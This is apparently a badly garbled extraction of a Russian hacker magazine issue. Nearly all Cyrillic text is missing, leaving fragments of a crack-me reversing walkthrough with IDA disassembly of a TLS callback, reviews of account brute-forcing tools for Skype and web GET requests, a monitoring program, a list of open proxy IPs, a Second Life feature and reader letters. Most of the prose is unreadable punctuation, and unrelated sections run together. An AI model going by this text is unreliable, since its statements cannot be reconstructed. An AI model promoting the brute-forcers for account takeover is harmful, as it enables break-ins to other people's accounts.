00403018 db 'condom-principle',0Ah, 0Ah

00403018 db 9,'it',27h,'d rather have one and not

need it... '

x 01 /121/ 09

>>

068

(manual load) , IDA Pro 5.3

HIEW , ,

KedaH3.exe HEX- , - , -

00403071 TlsIndx db 'http://kpnc.org',0

; DATA XREF: .data:TlsIndex_ptrvo

00403090 TlsDirectory dd offset TlsDirectory

; DATA XREF: .data:TlsDirectoryvo

00403094 TlsEnd_ptr dd offset TlsDirectory

00403098 TlsIndex_ptr dd offset TlsIndex

; "http://kpnc.org"

0040309C TlsCallbacks_ptr dd offset

TlsSizeOfZeroFill

004030A0 TlsSizeOfZeroFill dd offset

TlsCallback_0

004030A4 TlsCharacteristics dd 0

... . DEC EAX/RET, . , , . ( , ?), TLS callback , , TLS callback crack-me ! , - , . , , 00401049 jnp short loc_401012 - , ., CALL ds:MessageBoxA XOR EAX, EAX/MOV EAX, [EAX], . , SEH- ( ) , - ... . ! ? . , . , ? . . PAUSE - - . , , TLS callback crack-me, - , , ( , ).

. KedaH3.exe , - (Pause), TLS Callback (Goto), 401030 ( TLS Callback - IDA). 401030 Breakpoint, Hardware, on execution. Debug Hardware breakpoints, , , (Restart), Yes TLS Callback, ! IDA Pro Debugger ( 5.3). TlsCallback_0, . ! - , . . , , (, ?), !

. . ( ) . - :

1. -

2. XOR EAX, EAX/MOV EAX, [EAX]

RET

3. PE- -

/

condom-principle... http://kpnc.org, , . : MessageBoxA URL? , , Windows ... -, . , , , crack-me .z

x 01 /121/ 09

>>

069

Microsoft Portable Executable and Common Object File Format Specification: microsoft.com/whdc/system/platform/firmware/PECOFF.mspx.

KedaH3 Crack Me: kpnc.org/ftp/KedaH3.zip.

links

KedaH3.exe IDA Pro 5.3 ( )

KedaH3.exe

>>

x 01 /121/ 09 070

: SkyPe Bruter : *nix/win: mr.the

- - Skype-, . , Skype- $1. , : . , Skype Bruter, - :). PHP curl. base.txt : https- proxy.txt. , :

base.txt

:

log.txt

ua.txt (

)

proxy.txt -

sk.php

, , : ,

. :).P.S. PHP . , , .

: inVizer: windowS 2000/xP: & Jah

. , , ? :). , - InVizer. ICQ- :

1. ( -

log.txt)

2. icq--

3. timeout (

-

)

4. -

( )

5. /

6.

7.

8.

9.

10.

11.

/ / . . . ! GUI-- , , !

: StaffCoP: windowS 2000/xP: StaffCoP.ru

/- -, :). StaffCop, . , , / . :1. . , ,

r0id

/ [email protected] /

>>

071 x 01 /121/ 09

- , -. .2. . . - , . .3. -. - - . URL-, ( title), - . , :). , -, , .4. ICQ MSN Messenger. IM (ICQ MSN) UIN ICQ MSN, , ( ), . .5. USB-. - , USB-, .6. . - / (aka ) . . .7. . (aka ) . , - Windows :). , - , , , . , , , - .

: GetBrute: windowS 2000/xP: dimaS URL, - -. , . GetBrute, - GET- url. aka data.ini, :1. [connection]: url ( * , ^ ). HandleRedirects 0 1 1, 403.

China

2008-12-01

Whois

61.55.135.1:80

anonymous

China

2008-12-01

Whois

61.166.68.71:80

high anonymity

China

2008-12-01

Whois

202.98.23.114:80

anonymous

China

2008-12-01

Whois

208.62.125.146:80

high anonymity

United States

2008-12-02

Whois

89.234.27.15:80

anonymous

Great Britain (UK)

2008-12-02

Whois

202.98.23.116:80

anonymous

China

2008-12-02

Whois

, /PHP, , Find proxies for Me, . , :

1. (

txt/html/htm/mht

, )

2. -

(

)

3.

4.

5. -

IP (

IP aaa,bbb,ccc,ddd

Mifrill

/ [email protected] /

072

-, ... , . - . , . -, , . . - , . , , . , - ! , -

MUD , , - . : - ( mmorpg massively multiplayer online role-playing game) . World of warcraft, Lineage II, EVE online - () Second Life. , , - - Sims, , . ,

Web 2.0. -

. , ,

, Web 2.0 -

. , ,

,

. , ...

x 01 /121/ 09

>>

Second Life , BusinessWeek The Economist. , , , . , . - (Philip Rosedale). , , . , , , - , , - , . , 6-7 - ( Apple II) . 17 . - . 1994, , - . , , -. , . , , . - , , , ! , - . 90- 3D , , , , (, Second Life ). . , . , - , -. , , , . , , , , . , -.

, . FreeVue, . , RealNetworks (Rob Glaser), 1996- . , , RealNetworks. , , , , . , , . , - , , . 1999-. , , RealNetworks, Linden Alley . , Linden Labs, . - (Andrew Meadows), ... . , . , , , - , , - . ( ), . , , . - , - . . - - . , , . , Second Life , . ( -\) . , ; , , , . , - ?.. Second Life , . , , , , . , Second Life . ( 2003 ) Linden Labs , . 31- , . , 11, . , . , , , , , , .

>>

x 01 /121/ 09 073

2008 Second Life Technology & Engineering Emmy Awards

, , , - , , . , - , . Second Life -, , , , . Second Life , , , . - . , Second Life - , . , , , , -. , : , !, . - Linden Labs Linden, ( - ). - . Second Life , - , . , . - , , , , , , . , - 3D- Second Life . 2003- , ,

, , , . , , , . , - , , . , Linden Labs , -, , , . . , , : , , , . , ,

-, . , , .

, Second Life , , . -, ? , , , Linden Labs . , , -, Linden Labs -

>>

x 01 /121/ 09 074

Second Life Ginko Financial,

$700.000 .

Linden Labs , -

( ),

-

,

.

. ,

x 01 /121/ 09

>>

075

, , . , , , , . - , . -

, , . - , . . , , , -

, . . , Second Life . -, , 15 ., , . - , , . ; 45-50 . . Second Life , , ... , . Second Life - - ( Linden Labs. , - ). , . , - , . - , . . , Second Life - (L$) - . , 280 . , 2008 , - , 22- . , Linden Labs , , . , 2007 . Second Life Ginko Financial, $700.000 . Linden Labs , ( -), , . , - Linden Labs. , , 2007 . , , Linden Labs - , - . - , . , , , , . Dell Sun 2007 . . , , . , Second Life 2006-2007 , , -, ( Reebok). , , Second Life . , - . , Second Life

,

x 01 /121/ 09

>>

076

, . , , , , . , ,

, , -. Second Life : , , , , -, , , -. , , , Second Life , . Linden Labs , L$ , , . - , . , , :). , , , . , Second Life . , , . , , . , Linden Labs. , , , , PG , . ( , , ) ID, -

. , , (sic!) , , . , . . , , . -, Second Life. , . , 300 , , Linden Labs - . , . , - . , . , -, . 5 10, , - .

Second Life, , . , . , -, , - . , , , Second Life , , . , , , - , , -, , , . , Second Life , , . , -, . - , , Second Life . - - , , . . , . , , - . , , . , , , . - , , , . z

, SL ,

Second Life

: , ,

, , -

, , ,

.

>>

>>

.

, moroz ([email protected]) . - .

([email protected]) - , .

, Kir Rost ([email protected]). - , ([email protected]).

. . , glowren ([email protected]).

([email protected]) .

x 01 /121/ 09 078

[email protected]

( )

!

>>

, , , ([email protected]) - .

, , ([email protected]) .

([email protected]) .

ua ([email protected]) - .

([email protected]) .

, Robert Schweppes ([email protected]) .

079x 01 /121/ 09

1 2009

2008 ! www.gameland-award.ru

2009

Metal Gear Solid 4: Guns of the PatriotsCommand & Conquer: Red Alert 3Tomb Raider: UnderworldSuper Smash Bros. BrawlGuitar Hero: World TourGrand Theft Auto IVLittleBigPlanetPrince of PersiaDevil May Cry 4Soul Calibur IVGears of War 2Mirrors EdgeFallout 3Fable II

,

. 20

,

.

.

j1M

/ [email protected] /

x 01 /121/ 09

>> unixoid

082

- . ( ) , - . , Linux , . hdparm:

# hdparm -B 1 -S 12 /dev/sda

-B 1 . 254 : 1 127 ,